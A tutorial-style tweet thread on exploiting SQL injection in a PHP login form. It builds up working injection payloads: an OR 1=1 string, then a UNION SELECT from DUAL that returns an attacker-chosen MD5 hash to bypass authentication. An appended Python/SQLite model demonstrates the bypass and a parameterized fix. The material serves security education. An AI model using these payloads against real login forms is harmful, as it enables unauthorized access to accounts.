Rohit
Aug 25, 2022 • 11 tweets • 6 min read • Read on X
#Learn365 - Day 6️⃣

Can you identify and exploit the #security bug? 🤔

In today's thread, let's learn about exploit writing 🧵👇

#infosec #appsec #bugbountytips #security
This is SQLi, easy to guess. Which field is vulnerable? The username.

But the tricky part is how to exploit it.
If you dissect the code, you will notice that the SQL statement must return exactly one value. Otherwise the comparison in the PHP code will fail anyway.

What next?
What do you think will happen if I input:

" or 1=1;--

Think first!!
...
This will make SQL return the entire password column.
In turn, the PHP check will fail at line #2.

So you have to make the SQL statement return a single value, and that value has to be a password you can match.
To achieve that, you cannot use the generic 1=1 payload.

You know SQL has UNION, right? Can we use it?

Can we use UNION to dump a password that will match the check in the PHP?

I think yes!!
Go on!!
Slight detour: in SQL you can dump whatever you want. You know there is a DUAL table? A dummy table.

SELECT 'sec_r0' from DUAL;

This will dump a single value `sec_r0` in the output.
...
Can we use something like this to dump a password of our own choosing?
Let's see the modified SQL query with a UNION statement:

" or 1=1 UNION (SELECT 'sec_r0' from DUAL) ; --

What do you think this would do?
...
THINK
...
This will dump the entire password column, with the last value being one of our own choosing, right?
But we don't want the password column!!
If we don't want the password column, can we remove the results of the first table of the UNION completely?

<table1> UNION <table2>

where
the table1 output is coming from

SELECT password from USER where username="" or 1=1

and the entire table is dumped because of 1=1. What if we negate it?
Yes, that's the magic. Now see the payload:

" or 1!=1 UNION (SELECT 'sec_r0' from DUAL) ; --

...
THINK
...
This would negate the first table query completely and would only dump 'sec_r0' in the output, yes?

That's the magic of UNION.
Are we done?

Is this our final exploit?
...
No
Why?
Because the PHP code assumes the passwords are stored as MD5 hashes. That's why the input password is first MD5ed and then compared.

So guess what the perfect exploit would be.
Let's calculate the MD5 of sec_r0.
MD5(sec_r0) = ccf0d111cd0c1e45708a0aef7b2bcb74

So in the payload I would put:
" or 1!=1 UNION (SELECT 'ccf0d111cd0c1e45708a0aef7b2bcb74' from DUAL) ; --

and in the password input I would put sec_r0.

And bingo.
I will bypass the auth.
Isn't that amazing?
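To make the mechanism concrete from the defender's side, here is an added Python model (not code from the thread, and not the PHP shown in its image) of the login check beside its parameterized fix. It runs on SQLite, so the payloads are adapted to SQLite syntax (single-quoted literals, a bare `SELECT` of a constant instead of `from DUAL`); the user table, the `login_vulnerable`/`login_safe` names, and the assumption that the check requires exactly one returned row are all constructed here.

```python
import hashlib
import hmac
import sqlite3

# Constructed sample users (not from the original thread). Stored values are
# MD5 hex digests, matching the scheme the thread says the PHP code assumes.
SAMPLE_USERS = [
    ("alice", hashlib.md5(b"correct horse").hexdigest()),
    ("bob", hashlib.md5(b"battery staple").hexdigest()),
]

# The password the attacker wants to log in with, and its MD5 (computed here
# rather than copied from the thread).
CHOSEN_PASSWORD = "sec_r0"
CHOSEN_HASH = hashlib.md5(CHOSEN_PASSWORD.encode()).hexdigest()

# Payloads adapted to SQLite syntax: single-quoted string literals and a
# bare SELECT of a constant (SQLite has no DUAL table).
PAYLOAD_OR = "' OR 1=1 --"
PAYLOAD_UNION = f"' OR 1!=1 UNION SELECT '{CHOSEN_HASH}' --"


def make_db():
    # In-memory database seeded with the constructed users.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?)", SAMPLE_USERS)
    return conn


def build_vulnerable_query(username):
    # Same shape as the thread's query, with the user input spliced in as text.
    return f"SELECT password FROM user WHERE username = '{username}'"


def login_vulnerable(conn, username, password):
    """Model of the thread's PHP check (assumption: exactly one row must come
    back, and its value must equal md5(submitted password))."""
    rows = conn.execute(build_vulnerable_query(username)).fetchall()
    if len(rows) != 1:
        return False
    return rows[0][0] == hashlib.md5(password.encode()).hexdigest()


def login_safe(conn, username, password):
    """Hardened form: the username is bound as a parameter, so it can never
    change the statement; the digest comparison is constant-time."""
    rows = conn.execute(
        "SELECT password FROM user WHERE username = ?", (username,)
    ).fetchall()
    if len(rows) != 1:
        return False
    submitted = hashlib.md5(password.encode()).hexdigest()
    return hmac.compare_digest(rows[0][0], submitted)


def run_demo():
    conn = make_db()
    return {
        "legit_vulnerable": login_vulnerable(conn, "alice", "correct horse"),
        "legit_safe": login_safe(conn, "alice", "correct horse"),
        # 1=1 returns every password row, so the one-row check fails.
        "or_1eq1_vulnerable": login_vulnerable(conn, PAYLOAD_OR, CHOSEN_PASSWORD),
        # 1!=1 empties the first branch; UNION supplies the attacker's own hash.
        "union_vulnerable": login_vulnerable(conn, PAYLOAD_UNION, CHOSEN_PASSWORD),
        # Bound parameter: the payload is just a username that does not exist.
        "union_safe": login_safe(conn, PAYLOAD_UNION, CHOSEN_PASSWORD),
    }


if __name__ == "__main__":
    print(build_vulnerable_query(PAYLOAD_UNION))
    for name, ok in run_demo().items():
        print(f"{name}: {'LOGIN OK' if ok else 'rejected'}")
```

The model reproduces exactly what the thread walks through: the plain `1=1` payload is rejected because it returns more than one row, while the negated first branch plus `UNION SELECT` of a chosen hash yields one row the check accepts. Binding the username as a parameter removes the whole class of bug, independent of which comparison the PHP does afterwards; the MD5 scheme is kept only to mirror the page, and a real system would store passwords with a dedicated password hash rather than a fast digest.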

Keep this tweet bookmarked. You never know if someone asks you this in an interview.

Also,
if you like the way I explained it, consider 🔁 the thread.
Also, stay tuned (follow @sec_r0) for more such interesting threads.

I am running #Learn365 ❤️
